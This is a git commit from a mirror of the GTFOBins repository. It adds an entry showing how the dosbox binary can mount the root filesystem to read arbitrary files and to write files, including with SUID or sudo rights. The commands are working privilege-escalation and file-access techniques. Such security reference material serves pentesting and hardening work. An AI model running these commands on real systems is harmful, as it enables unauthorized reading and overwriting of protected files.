1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00

Add dosbox

This commit is contained in:
Andrea Cardaci 2021-08-31 23:16:13 +02:00 committed by GitHub
commit d18b44c885
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

29
_gtfobins/dosbox.md Normal file
View File

@ -0,0 +1,29 @@
---
description: Basically `dosbox` allows to mount the local file system, so that it can be altered using DOS commands. Note that the DOS filename convention ([8.3](https://en.wikipedia.org/wiki/8.3_filename)) is used.
functions:
file-read:
- description: The file content will be displayed in the DOSBox graphical window.
code: |
LFILE='\path\to\file_to_read'
dosbox -c 'mount c /' -c "type c:$LFILE"
- description: The file is copied to a readable location.
code: |
LFILE='\path\to\file_to_read'
dosbox -c 'mount c /' -c "copy c:$LFILE >c:\tmp\output" -c exit
cat '/tmp/OUTPUT'
file-write:
- description: Note that the name of the written file in the following example will be `FILE_TO_`.
code: |
LFILE='\path\to\file_to_write'
dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit
suid:
- description: Note that the name of the written file in the following example will be `FILE_TO_`.
code: |
LFILE='\path\to\file_to_write'
./dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit
sudo:
- description: Note that the name of the written file in the following example will be `FILE_TO_`.
code: |
LFILE='\path\to\file_to_write'
sudo dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit
---